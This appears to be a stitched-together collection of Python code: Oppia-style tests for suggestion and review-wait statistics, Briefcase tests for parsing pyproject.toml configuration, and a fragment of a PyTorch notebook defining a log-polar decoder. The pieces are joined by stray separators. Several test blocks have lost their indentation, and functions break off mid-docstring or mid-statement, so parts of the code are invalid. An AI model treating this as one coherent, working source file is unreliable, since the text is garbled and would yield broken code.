        # Assert that the question suggestion decreased because the suggestion
        # was rejected.
        self._assert_community_contribution_stats_is_in_default_state()
        # Change the question_dict of the question suggestion that got rejected
        # so we can resubmit the suggestion for review.
        resubmit_question_change = question_suggestion.change
        resubmit_question_change.question_dict['linked_skill_ids'] = ['skill1']
        # Resubmit the rejected question suggestion.
        suggestion_services.resubmit_rejected_suggestion(
            question_suggestion.suggestion_id, 'resubmit summary message',
            self.author_id, resubmit_question_change
        )
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 1)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code, {})
    def test_create_translation_suggestion_raises_translation_suggestion_count(
            self):
        """A new translation suggestion registers a count of one under its
        language code; question stats stay at zero.
        """
        self._create_translation_suggestion_with_language_code(
            self.language_code)
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 0)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code,
            {self.language_code: 1})
    def test_create_translation_suggestions_diff_lang_raises_translation_counts(
            self):
        """Translation suggestions in different languages are counted
        separately per language code.
        """
        self._create_translation_suggestion_with_language_code('hi')
        self._create_translation_suggestion_with_language_code('en')
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 0)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code,
            {'hi': 1, 'en': 1})
    def test_create_translation_suggestions_eq_lang_increases_translation_count(
            self):
        """Two translation suggestions in the same language accumulate
        under a single language-code count.
        """
        self._create_translation_suggestion_with_language_code('hi')
        self._create_translation_suggestion_with_language_code('hi')
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 0)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code, {'hi': 2})
    def test_accept_translation_suggestion_lowers_translation_suggestion_count(
            self):
        """Accepting the only translation suggestion returns the stats to
        the default (all-zero) state.
        """
        translation_suggestion = (
            self._create_translation_suggestion_with_language_code(
                self.language_code))
        # Assert that the translation suggestion count increased.
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 0)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code,
            {self.language_code: 1})
        suggestion_services.accept_suggestion(
            translation_suggestion.suggestion_id, self.reviewer_id,
            self.COMMIT_MESSAGE, 'review message')
        self._assert_community_contribution_stats_is_in_default_state()
    def test_reject_translation_suggestion_lowers_translation_suggestion_count(
            self):
        """Rejecting the only translation suggestion returns the stats to
        the default (all-zero) state.
        """
        translation_suggestion = (
            self._create_translation_suggestion_with_language_code(
                self.language_code))
        # Assert that the translation suggestion count increased.
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 0)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code,
            {self.language_code: 1})
        suggestion_services.reject_suggestion(
            translation_suggestion.suggestion_id, self.reviewer_id,
            'review message')
        self._assert_community_contribution_stats_is_in_default_state()
    def test_reject_one_translation_suggestion_diff_lang_lowers_only_one_count(
            self):
        """Rejecting a suggestion in one language only decrements that
        language's count; the other language's count is untouched.
        """
        translation_suggestion_1 = (
            self._create_translation_suggestion_with_language_code('hi'))
        # Create a translation suggestion in a different language that won't be
        # rejected.
        self._create_translation_suggestion_with_language_code('en')
        # Assert that the translation suggestion count increased.
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 0)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code,
            {'hi': 1, 'en': 1})
        suggestion_services.reject_suggestion(
            translation_suggestion_1.suggestion_id, self.reviewer_id,
            'review message')
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 0)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code, {'en': 1})
    def test_reject_translation_suggestions_diff_lang_lowers_translation_count(
            self):
        """Batch-rejecting suggestions across two languages returns the
        stats to the default (all-zero) state.
        """
        translation_suggestion_1 = (
            self._create_translation_suggestion_with_language_code('hi'))
        translation_suggestion_2 = (
            self._create_translation_suggestion_with_language_code('en'))
        # Assert that the translation suggestion count increased.
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 0)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code,
            {'hi': 1, 'en': 1})
        suggestion_services.reject_suggestions(
            [
                translation_suggestion_1.suggestion_id,
                translation_suggestion_2.suggestion_id
            ], self.reviewer_id, 'review message')
        self._assert_community_contribution_stats_is_in_default_state()
def test_reject_translation_suggestions_same_lang_lowers_translation_count(
self):
translation_suggestion_1 = (
self._create_translation_suggestion_with_language_code(
self.language_code))
translation_suggestion_2 = (
self._create_translation_suggestion_with_language_code(
self.language_code))
# Assert that the translation suggestion count increased.
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 0)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code,
{self.language_code: 2})
suggestion_services.reject_suggestions(
[
translation_suggestion_1.suggestion_id,
translation_suggestion_2.suggestion_id
], self.reviewer_id, 'review message')
self._assert_community_contribution_stats_is_in_default_state()
def test_reject_suggestions_diff_type_decreases_suggestion_counts(self):
suggestion_1 = (
self._create_translation_suggestion_with_language_code('hi'))
suggestion_2 = (
self._create_translation_suggestion_with_language_code('en'))
suggestion_3 = self._create_edit_state_content_suggestion()
suggestion_4 = self._create_question_suggestion()
# Assert that the suggestion counts increased.
stats = suggestion_services.get_community_contribution_stats()
self.assertEqual(stats.question_reviewer_count, 0)
self.assertEqual(stats.question_suggestion_count, 1)
self.assertDictEqual(
stats.translation_reviewer_counts_by_lang_code, {})
self.assertDictEqual(
stats.translation_suggestion_counts_by_lang_code,
{'hi': 1, 'en': 1})
suggestion_services.reject_suggestions(
[
suggestion_1.suggestion_id, suggestion_2.suggestion_id,
suggestion_3.suggestion_id, suggestion_4.suggestion_id
], self.reviewer_id, 'review message')
self._assert_community_contribution_stats_is_in_default_state()
    def test_create_suggestions_diff_type_increases_suggestion_counts(self):
        """Creating suggestions of different types bumps the corresponding
        suggestion counts (reviewer counts are unaffected by creation).
        """
        self._create_translation_suggestion_with_language_code('hi')
        self._create_translation_suggestion_with_language_code('en')
        self._create_question_suggestion()

        # One question and one translation per language are now counted.
        stats = suggestion_services.get_community_contribution_stats()
        self.assertEqual(stats.question_reviewer_count, 0)
        self.assertEqual(stats.question_suggestion_count, 1)
        self.assertDictEqual(
            stats.translation_reviewer_counts_by_lang_code, {})
        self.assertDictEqual(
            stats.translation_suggestion_counts_by_lang_code,
            {'hi': 1, 'en': 1})
class GetSuggestionsWaitingTooLongForReviewInfoForAdminsUnitTests(
        test_utils.GenericTestBase):
    """Test the ability of the
    get_info_about_suggestions_waiting_too_long_for_review method in suggestion
    services, which is used to retrieve the information required to notify
    admins if there are suggestions that have waited longer than
    suggestion_models.SUGGESTION_REVIEW_WAIT_TIME_THRESHOLD_IN_DAYS days for a
    review on the Contributor Dashboard.
    """

    # Fixed ids and emails shared by all the tests below.
    target_id = 'exp1'
    skill_id = 'skill_123456'
    language_code = 'en'
    AUTHOR_EMAIL = '<EMAIL>'
    REVIEWER_1_EMAIL = '<EMAIL>'
    REVIEWER_2_EMAIL = '<EMAIL>'
    COMMIT_MESSAGE = 'commit message'
    # Frozen "now" so review wait times can be controlled precisely by the
    # mock_datetime_utcnow context managers used in the tests.
    mocked_datetime_utcnow = datetime.datetime(2020, 6, 15, 5)

    def _create_translation_suggestion(self):
        """Creates a translation suggestion."""
        add_translation_change_dict = {
            'cmd': exp_domain.CMD_ADD_TRANSLATION,
            'state_name': feconf.DEFAULT_INIT_STATE_NAME,
            'content_id': feconf.DEFAULT_NEW_STATE_CONTENT_ID,
            'language_code': self.language_code,
            'content_html': feconf.DEFAULT_INIT_STATE_CONTENT_STR,
            'translation_html': '<p>This is the translated content.</p>'
        }

        return suggestion_services.create_suggestion(
            suggestion_models.SUGGESTION_TYPE_TRANSLATE_CONTENT,
            suggestion_models.TARGET_TYPE_EXPLORATION,
            self.target_id, feconf.CURRENT_STATE_SCHEMA_VERSION,
            self.author_id, add_translation_change_dict,
            'test description'
        )

    def _create_question_suggestion(self):
        """Creates a question suggestion."""
        add_question_change_dict = {
            'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
            'question_dict': {
                'question_state_data': self._create_valid_question_data(
                    'default_state').to_dict(),
                'language_code': self.language_code,
                'question_state_data_schema_version': (
                    feconf.CURRENT_STATE_SCHEMA_VERSION),
                'linked_skill_ids': ['skill_1'],
                'inapplicable_skill_misconception_ids': ['skillid12345-1']
            },
            'skill_id': self.skill_id,
            'skill_difficulty': 0.3
        }

        return suggestion_services.create_suggestion(
            suggestion_models.SUGGESTION_TYPE_ADD_QUESTION,
            suggestion_models.TARGET_TYPE_SKILL,
            self.skill_id, feconf.CURRENT_STATE_SCHEMA_VERSION,
            self.author_id, add_question_change_dict,
            'test description'
        )

    def _create_reviewable_suggestion_email_infos_from_suggestions(
            self, suggestions):
        """Creates a list of ReviewableSuggestionEmailInfo objects from
        the given suggestions.
        """
        return [
            (
                suggestion_services
                .create_reviewable_suggestion_email_info_from_suggestion(
                    suggestion)
            ) for suggestion in suggestions
        ]

    def _assert_reviewable_suggestion_email_infos_are_in_correct_order(
            self, reviewable_suggestion_email_infos,
            expected_reviewable_suggestion_email_infos):
        """Asserts that the reviewable suggestion email infos are equal to the
        expected reviewable suggestion email infos and that the reviewable
        suggestion email infos are sorted in descending order according to
        review wait time.
        """
        self.assertEqual(
            len(reviewable_suggestion_email_infos),
            len(expected_reviewable_suggestion_email_infos)
        )
        # Field-by-field equality against the expected infos.
        for index, reviewable_suggestion_email_info in enumerate(
                reviewable_suggestion_email_infos):
            self.assertEqual(
                reviewable_suggestion_email_info.suggestion_type,
                expected_reviewable_suggestion_email_infos[
                    index].suggestion_type)
            self.assertEqual(
                reviewable_suggestion_email_info.language_code,
                expected_reviewable_suggestion_email_infos[
                    index].language_code)
            self.assertEqual(
                reviewable_suggestion_email_info.suggestion_content,
                expected_reviewable_suggestion_email_infos[
                    index].suggestion_content)
            self.assertEqual(
                reviewable_suggestion_email_info.submission_datetime,
                expected_reviewable_suggestion_email_infos[
                    index].submission_datetime)
        # Ascending submission datetime == descending review wait time.
        for index in python_utils.RANGE(
                len(reviewable_suggestion_email_infos) - 1):
            self.assertLess(
                reviewable_suggestion_email_infos[index].submission_datetime,
                reviewable_suggestion_email_infos[
                    index + 1].submission_datetime
            )

    def setUp(self):
        """Registers an author, two reviewers, and the exploration and skill
        that suggestions in these tests target.
        """
        super(
            GetSuggestionsWaitingTooLongForReviewInfoForAdminsUnitTests,
            self).setUp()
        self.signup(self.AUTHOR_EMAIL, 'author')
        self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
        self.signup(self.REVIEWER_1_EMAIL, 'reviewer1')
        self.reviewer_1_id = self.get_user_id_from_email(
            self.REVIEWER_1_EMAIL)
        self.signup(self.REVIEWER_2_EMAIL, 'reviewer2')
        self.reviewer_2_id = self.get_user_id_from_email(
            self.REVIEWER_2_EMAIL)
        self.save_new_valid_exploration(self.target_id, self.author_id)
        self.save_new_skill(self.skill_id, self.author_id)

    def test_get_returns_empty_for_suggestion_type_not_on_contributor_dashboard(
            self):
        """Suggestion types outside the Contributor Dashboard list are not
        reported, even when they have waited past the threshold.
        """
        self._create_translation_suggestion()
        # This mocked list cannot be empty because then the storage query in the
        # get_suggestions_waiting_too_long_for_review method will fail.
        mocked_contributor_dashboard_suggestion_types = [
            suggestion_models.SUGGESTION_TYPE_ADD_QUESTION]

        with self.swap(
            suggestion_models, 'CONTRIBUTOR_DASHBOARD_SUGGESTION_TYPES',
            mocked_contributor_dashboard_suggestion_types):
            with self.swap(
                suggestion_models,
                'SUGGESTION_REVIEW_WAIT_TIME_THRESHOLD_IN_DAYS', 0):
                info_about_suggestions_waiting_too_long_for_review = (
                    suggestion_services
                    .get_info_about_suggestions_waiting_too_long_for_review()
                )

        self.assertEqual(
            len(info_about_suggestions_waiting_too_long_for_review), 0)

    def test_get_returns_empty_if_suggestion_review_wait_time_diff_is_negative(
            self):
        """A freshly created suggestion has waited less than a nonzero
        threshold, so nothing is reported.
        """
        self._create_translation_suggestion()

        # Make sure the threshold is nonzero.
        with self.swap(
            suggestion_models,
            'SUGGESTION_REVIEW_WAIT_TIME_THRESHOLD_IN_DAYS', 1):
            info_about_suggestions_waiting_too_long_for_review = (
                suggestion_services
                .get_info_about_suggestions_waiting_too_long_for_review()
            )

        self.assertEqual(
            len(info_about_suggestions_waiting_too_long_for_review), 0)

    def test_get_returns_empty_if_suggestions_have_waited_less_than_threshold(
            self):
        """Suggestions that have waited strictly less than the threshold
        number of days are not reported.
        """
        with self.mock_datetime_utcnow(self.mocked_datetime_utcnow):
            self._create_translation_suggestion()
            self._create_question_suggestion()
        mocked_threshold_review_wait_time_in_days = 2
        mocked_datetime_less_than_review_wait_time_threshold = (
            self.mocked_datetime_utcnow + datetime.timedelta(days=1))

        with self.mock_datetime_utcnow(
            mocked_datetime_less_than_review_wait_time_threshold):
            with self.swap(
                suggestion_models,
                'SUGGESTION_REVIEW_WAIT_TIME_THRESHOLD_IN_DAYS',
                mocked_threshold_review_wait_time_in_days):
                info_about_suggestions_waiting_too_long_for_review = (
                    suggestion_services
                    .get_info_about_suggestions_waiting_too_long_for_review()
                )

        self.assertEqual(
            len(info_about_suggestions_waiting_too_long_for_review), 0)

    def test_get_returns_empty_if_suggestions_have_waited_threshold_review_time(
            self):
        """A wait time exactly equal to the threshold is not considered
        "too long" — the wait must exceed the threshold.
        """
        with self.mock_datetime_utcnow(self.mocked_datetime_utcnow):
            self._create_translation_suggestion()
        mocked_threshold_review_wait_time_in_days = 2
        mocked_datetime_eq_review_wait_time_threshold = (
            self.mocked_datetime_utcnow + datetime.timedelta(
                days=mocked_threshold_review_wait_time_in_days))

        with self.mock_datetime_utcnow(
            mocked_datetime_eq_review_wait_time_threshold):
            with self.swap(
                suggestion_models,
                'SUGGESTION_REVIEW_WAIT_TIME_THRESHOLD_IN_DAYS',
                mocked_threshold_review_wait_time_in_days):
                info_about_suggestions_waiting_too_long_for_review = (
                    suggestion_services
                    .get_info_about_suggestions_waiting_too_long_for_review()
                )

        self.assertEqual(
            len(info_about_suggestions_waiting_too_long_for_review), 0)

    def test_get_returns_suggestion_waited_long_if_their_wait_is_past_threshold(
            self):
        """Suggestions that have waited longer than the threshold are
        reported, in order of submission time.
        """
        with self.mock_datetime_utcnow(self.mocked_datetime_utcnow):
            translation_suggestion = self._create_translation_suggestion()
        # Give the question suggestion a slightly different review submission
        # time so that the suggestions are not indistinguishable, in terms of
        # their review submission time.
        with self.mock_datetime_utcnow(
            self.mocked_datetime_utcnow + datetime.timedelta(minutes=5)):
            question_suggestion = self._create_question_suggestion()
        expected_suggestion_email_infos = (
            self._create_reviewable_suggestion_email_infos_from_suggestions(
                [translation_suggestion, question_suggestion]))
        mocked_threshold_review_wait_time_in_days = 1
        mocked_datetime_past_review_wait_time_threshold = (
            self.mocked_datetime_utcnow + datetime.timedelta(days=2))

        with self.mock_datetime_utcnow(
            mocked_datetime_past_review_wait_time_threshold):
            with self.swap(
                suggestion_models,
                'SUGGESTION_REVIEW_WAIT_TIME_THRESHOLD_IN_DAYS',
                mocked_threshold_review_wait_time_in_days):
                info_about_suggestions_waiting_too_long_for_review = (
                    suggestion_services
                    .get_info_about_suggestions_waiting_too_long_for_review()
                )

        self.assertEqual(
            len(info_about_suggestions_waiting_too_long_for_review), 2)
        self._assert_reviewable_suggestion_email_infos_are_in_correct_order(
            info_about_suggestions_waiting_too_long_for_review,
            expected_suggestion_email_infos
        )

    def test_get_only_returns_suggestions_that_have_waited_past_wait_threshold(
            self):
        """Only suggestions whose individual wait exceeds the threshold are
        returned; more recent ones are filtered out.
        """
        with self.mock_datetime_utcnow(self.mocked_datetime_utcnow):
            translation_suggestion = self._create_translation_suggestion()
        with self.mock_datetime_utcnow(
            self.mocked_datetime_utcnow + datetime.timedelta(days=2)):
            self._create_question_suggestion()
        expected_suggestion_email_infos = (
            self._create_reviewable_suggestion_email_infos_from_suggestions(
                [translation_suggestion]))
        mocked_threshold_review_wait_time_in_days = 3
        mocked_datetime_past_review_wait_time_threshold = (
            self.mocked_datetime_utcnow + datetime.timedelta(days=4))

        with self.mock_datetime_utcnow(
            mocked_datetime_past_review_wait_time_threshold):
            with self.swap(
                suggestion_models,
                'SUGGESTION_REVIEW_WAIT_TIME_THRESHOLD_IN_DAYS',
                mocked_threshold_review_wait_time_in_days):
                info_about_suggestions_waiting_too_long_for_review = (
                    suggestion_services
                    .get_info_about_suggestions_waiting_too_long_for_review()
                )

        # The question suggestion was created 2 days after the translation
        # suggestion, so it has only waited 1 day for a review, which is less
        # than 3, the mocked review wait time threshold. Therefore, only the
        # translation suggestion has waited too long for review.
        self.assertEqual(
            len(info_about_suggestions_waiting_too_long_for_review), 1)
        self._assert_reviewable_suggestion_email_infos_are_in_correct_order(
            info_about_suggestions_waiting_too_long_for_review,
            expected_suggestion_email_infos
        )
class GetSuggestionTypesThatNeedReviewersUnitTests(test_utils.GenericTestBase):
"""Tests for the get_suggestion_types_that_need_reviewers method."""
sample_language_code = 'en'
target_id = 'exp1'
skill_id = 'skill_123456'
language_code = 'en'
AUTHOR_EMAIL = '<EMAIL>'
REVIEWER_EMAIL = '<EMAIL>'
def _create_translation_suggestion_with_language_code(self, language_code):
"""Creates a translation suggestion in the given | |
from io import StringIO
import pytest
from briefcase.config import parse_config
from briefcase.exceptions import BriefcaseConfigError
def test_invalid_toml():
    """A config file that is not valid TOML raises a config error."""
    bad_content = StringIO("this is not toml!")

    with pytest.raises(BriefcaseConfigError, match="Invalid pyproject.toml"):
        parse_config(bad_content, platform='macOS', output_format='app')
def test_no_briefcase_section():
    """A pyproject with tool sections but no tool.briefcase raises an error."""
    pyproject = StringIO(
        """
        [tool.section]
        name="value"
        number=42
        """
    )

    with pytest.raises(BriefcaseConfigError, match="No tool.briefcase section"):
        parse_config(pyproject, platform='macOS', output_format='app')
def test_no_apps():
    """A tool.briefcase section with no app tables raises an error."""
    pyproject = StringIO(
        """
        [tool.briefcase]
        name="value"
        number=42
        """
    )

    with pytest.raises(BriefcaseConfigError, match="No Briefcase apps defined"):
        parse_config(pyproject, platform='macOS', output_format='app')
def test_single_minimal_app():
    """A single app may be declared without any attributes of its own."""
    pyproject = StringIO(
        """
        [tool.briefcase]
        value = 42
        [tool.briefcase.app.my_app]
        """
    )

    globals_found, apps_found = parse_config(
        pyproject, platform='macOS', output_format='app')

    # Only the single base-level option is global.
    assert globals_found == {'value': 42}

    # The app is named after its table header, and inherits the global value
    # from the base tool.briefcase definition.
    assert apps_found == {
        'my_app': {
            "app_name": "my_app",
            "value": 42
        }
    }
def test_multiple_minimal_apps():
    "The configuration can contain multiple apps without an explicit tool header"
    config_file = StringIO(
        """
        [tool.briefcase.app.first]
        number=37
        [tool.briefcase.app.second]
        app_name="my_app"
        number=42
        """
    )

    global_options, apps = parse_config(config_file, platform='macOS', output_format='app')

    # There are no global options (no base [tool.briefcase] table exists).
    assert global_options == {}

    # Each app gets its key from its header line; an explicit app_name
    # setting (as in the second app) overrides the derived name.
    assert apps == {
        'first': {
            "app_name": "first",
            "number": 37,
        },
        'second': {
            "app_name": "my_app",
            "number": 42,
        },
    }
def test_platform_override():
    "An app can define platform settings that override base settings"
    config_file = StringIO(
        """
        [tool.briefcase]
        value = 0
        basevalue = "the base"
        [tool.briefcase.app.my_app]
        value = 1
        appvalue = "the app"
        [tool.briefcase.app.my_app.macOS]
        value = 2
        platformvalue = "macos platform"
        [tool.briefcase.app.my_app.linux]
        value = 3
        platformvalue = "linux platform"
        [tool.briefcase.app.other_app.macOS]
        value = 4
        platformvalue = "other macos platform"
        """
    )

    global_options, apps = parse_config(config_file, platform='macOS', output_format='app')

    # The global options are exactly as specified
    assert global_options == {
        'value': 0,
        'basevalue': 'the base',
    }

    # Since a macOS app has been requested, the macOS platform values
    # take priority. Linux configuration values are dropped.
    # The second app doesn't provide an explicit app-level config, but
    # the app exists because the platform exists.
    # Platforms should be processed in sorted order, which means that linux
    # will be processed before macos.
    assert apps == {
        'my_app': {
            "app_name": "my_app",
            "value": 2,
            "basevalue": "the base",
            "appvalue": "the app",
            "platformvalue": "macos platform",
        },
        'other_app': {
            "app_name": "other_app",
            "value": 4,
            "basevalue": "the base",
            "platformvalue": "other macos platform",
        }
    }
def test_platform_override_ordering():
    "The order of platform processing doesn't affect output"
    config_file = StringIO(
        """
        [tool.briefcase]
        value = 0
        basevalue = "the base"
        [tool.briefcase.app.my_app]
        value = 1
        appvalue = "the app"
        [tool.briefcase.app.my_app.macOS]
        value = 2
        platformvalue = "macos platform"
        [tool.briefcase.app.my_app.windows]
        value = 3
        platformvalue = "windows platform"
        [tool.briefcase.app.other_app.macOS]
        value = 4
        platformvalue = "other macos platform"
        """
    )

    global_options, apps = parse_config(config_file, platform='macOS', output_format='app')

    # The global options are exactly as specified
    assert global_options == {
        'value': 0,
        'basevalue': "the base"
    }

    # Since a macOS app has been requested, the macOS platform values
    # take priority. Windows configuration values are dropped.
    # The second app doesn't provide an explicit app-level config, but
    # the app exists because the platform exists.
    # Platforms should be processed in order, which means that windows
    # will be processed after macos (the mirror of test_platform_override,
    # where the other platform sorts before macos).
    assert apps == {
        'my_app': {
            "app_name": "my_app",
            "value": 2,
            "basevalue": "the base",
            "appvalue": "the app",
            "platformvalue": "macos platform",
        },
        'other_app': {
            "app_name": "other_app",
            "value": 4,
            "basevalue": "the base",
            "platformvalue": "other macos platform",
        }
    }
def test_format_override():
    "An app can define format settings that override base and platform settings"
    config_file = StringIO(
        """
        [tool.briefcase]
        value = 0
        basevalue = "the base"
        [tool.briefcase.app.my_app]
        value = 1
        appvalue = "the app"
        [tool.briefcase.app.my_app.macOS]
        value = 2
        platformvalue = "macos platform"
        [tool.briefcase.app.my_app.macOS.app]
        value = 21
        formatvalue = "app format"
        [tool.briefcase.app.my_app.macOS.dmg]
        value = 22
        formatvalue = "dmg format"
        [tool.briefcase.app.my_app.macOS.homebrew]
        value = 23
        formatvalue = "homebrew format"
        [tool.briefcase.app.my_app.linux]
        value = 3
        platformvalue = "linux platform"
        [tool.briefcase.app.my_app.linux.snap]
        value = 31
        formatvalue = "snap format"
        [tool.briefcase.app.my_app.linux.appimage]
        value = 32
        formatvalue = "appimage format"
        [tool.briefcase.app.other_app.macOS.app]
        value = 41
        formatvalue = "other macos app format"
        """
    )

    global_options, apps = parse_config(config_file, platform='macOS', output_format='app')

    # The global options are exactly as specified
    assert global_options == {
        'value': 0,
        'basevalue': "the base"
    }

    # Since a macOS app has been requested, the macOS app format values
    # take priority. Linux configuration values are dropped.
    # The second app doesn't provide an explicit app-level config, but
    # the app exists because the platform exists.
    # Formats should be processed in order, which means that app
    # will be processed before dmg and homebrew.
    assert apps == {
        'my_app': {
            "app_name": "my_app",
            "value": 21,
            "basevalue": "the base",
            "appvalue": "the app",
            "platformvalue": "macos platform",
            "formatvalue": "app format",
        },
        'other_app': {
            "app_name": "other_app",
            "value": 41,
            "basevalue": "the base",
            "formatvalue": "other macos app format",
        }
    }
def test_format_override_ordering():
    "The order of format processing doesn't affect output"
    config_file = StringIO(
        """
        [tool.briefcase]
        value = 0
        basevalue = "the base"
        [tool.briefcase.app.my_app]
        value = 1
        appvalue = "the app"
        [tool.briefcase.app.my_app.macOS]
        value = 2
        platformvalue = "macos platform"
        [tool.briefcase.app.my_app.macOS.app]
        value = 21
        formatvalue = "app format"
        [tool.briefcase.app.my_app.macOS.dmg]
        value = 22
        formatvalue = "dmg format"
        [tool.briefcase.app.my_app.macOS.homebrew]
        value = 23
        formatvalue = "homebrew format"
        [tool.briefcase.app.my_app.linux]
        value = 3
        platformvalue = "linux platform"
        [tool.briefcase.app.my_app.linux.snap]
        value = 31
        formatvalue = "snap format"
        [tool.briefcase.app.my_app.linux.appimage]
        value = 32
        formatvalue = "appimage format"
        [tool.briefcase.app.other_app.macOS.app]
        value = 41
        formatvalue = "other macos app format"
        """
    )

    # Same config as test_format_override, but requesting the dmg format.
    global_options, apps = parse_config(config_file, platform='macOS', output_format='dmg')

    # The global options are exactly as specified
    assert global_options == {
        'value': 0,
        'basevalue': "the base"
    }

    # Since a macOS dmg has been requested, the macOS dmg format values
    # take priority. Linux configuration values are dropped.
    # The second app doesn't provide an explicit app-level config, but
    # the app exists because the platform exists.
    # Formats should be processed in order, which means that dmg
    # will be processed after app, but before homebrew.
    assert apps == {
        'my_app': {
            "app_name": "my_app",
            "value": 22,
            "basevalue": "the base",
            "appvalue": "the app",
            "platformvalue": "macos platform",
            "formatvalue": "dmg format",
        },
        'other_app': {
            "app_name": "other_app",
            "value": 0,
            "basevalue": "the base",
        }
    }
def test_requires():
"Requirements can be specified"
config_file = StringIO(
"""
[tool.briefcase]
value = 0
requires = ["base value"]
[tool.briefcase.app.my_app]
requires = ["my_app value"]
[tool.briefcase.app.my_app.macOS]
requires = ["macos value"]
[tool.briefcase.app.my_app.macOS.app]
requires = ["app value"]
[tool.briefcase.app.my_app.macOS.dmg]
requires = ["dmg value"]
[tool.briefcase.app.my_app.linux]
requires = ["linux value"]
[tool.briefcase.app.my_app.linux.appimage]
requires = ["appimage value"]
[tool.briefcase.app.other_app]
"""
)
# Request a macOS app
global_options, apps = parse_config(config_file, platform='macOS', output_format='app')
# The global options are exactly as specified
assert global_options == {
'value': 0,
'requires': ["base value"],
}
# The macOS my_app app specifies a full inherited chain.
# The other_app app doesn't specify any options.
assert apps == {
'my_app': {
"app_name": "my_app",
"requires": [
"base value",
"my_app value",
"macos value",
"app value",
],
"value": 0,
},
'other_app': {
"app_name": "other_app",
"requires": [
"base value",
],
"value": 0,
}
}
# Request a macOS dmg
config_file.seek(0)
global_options, apps = parse_config(config_file, platform='macOS', output_format='dmg')
# The global options are exactly as specified
assert global_options == {
'value': 0,
'requires': ["base value"]
}
# The macOS my_app dmg specifies a full inherited chain.
# The other_app dmg doesn't specify any options.
assert apps == {
'my_app': {
"app_name": "my_app",
"requires": [
"base value",
"my_app value",
"macos value",
"dmg value",
],
"value": 0,
},
'other_app': {
"app_name": "other_app",
"requires": [
"base value",
],
"value": 0,
}
}
config_file.seek(0)
global_options, apps = parse_config(config_file, platform='linux', output_format='appimage')
# The global options are exactly as specified
assert global_options == {
'value': 0,
'requires': ["base value"]
}
# The linux my_app appimage overrides the *base* | |
nn.ReLU()(x) # sparse code
#x = self.unconv4(x) # dense code
#print(x.shape)
#x = self.unconv3b(x)
#x = nn.ReLU()(x) # sparse code
#x = self.unconv3(x) # dense code
#print(x.shape)
#x = self.unconv2b(x)
#x = nn.ReLU()(x) # sparse code
x = self.unconv2(x) # dense code
#print(x.shape)
#x = self.unconv1b(x)
x = nn.ReLU()(x) # sparse code
x = self.unconv1(x)
#print(x.shape)
x = x.view(-1, self.n_color, self.n_theta, self.n_phase, self.n_levels, self.n_eccentricity, self.n_azimuth)
x = x.permute(0, 4, 1, 5, 6, 2, 3).contiguous()
return x
# #### Tests

# In[491]:

# Smoke-test the decoder on a previously computed code tensor, then free it.
# NOTE(review): Decoder is constructed with n_levels - 1 here while the
# autoencoder below uses n_levels — confirm this is intentional.
dec = Decoder(n_levels - 1, n_color, n_eccentricity, n_azimuth, n_theta, n_phase)
dec_out = dec(code) #, indices1, indices2)
dec_out.shape
# In[492]:
del dec
# In[493]:
class InverseLogGaborMapper(nn.Module):
    """Learned linear inverse of the log-Gabor transform.

    A single fully connected layer maps a flattened block of log-Gabor
    coefficients back to a flat width*width image patch.
    """

    def __init__(self, in_chan = n_eccentricity * n_azimuth * n_theta * n_phase,
                 out_chan = width * width):
        super(InverseLogGaborMapper, self).__init__()
        # The entire inverse mapping is carried by one dense layer.
        self.inverseMap = nn.Linear(in_chan, out_chan)

    def forward(self, x, **kargs):
        # Extra keyword arguments are accepted for interface compatibility
        # but ignored.
        return self.inverseMap(x)
# ### Model and learning params
# In[1502]:
batch_size = 50
autoenc_lr = 1e-4
invLG_lr = 1e-4
n_epoch = 10000
recording_steps = 10
# In[1503]:
'''if False:
fic_name = '2021-03-10-log-polar-deep-convolutional-no-max-pool-laplace-lab'+'_autoenc.pt'
autoenc = torch.load(fic_name)
for param in autoenc.encoder_l.parameters():
param.requires_grad = False
for param in autoenc.decoder_l.parameters():
param.requires_grad = False
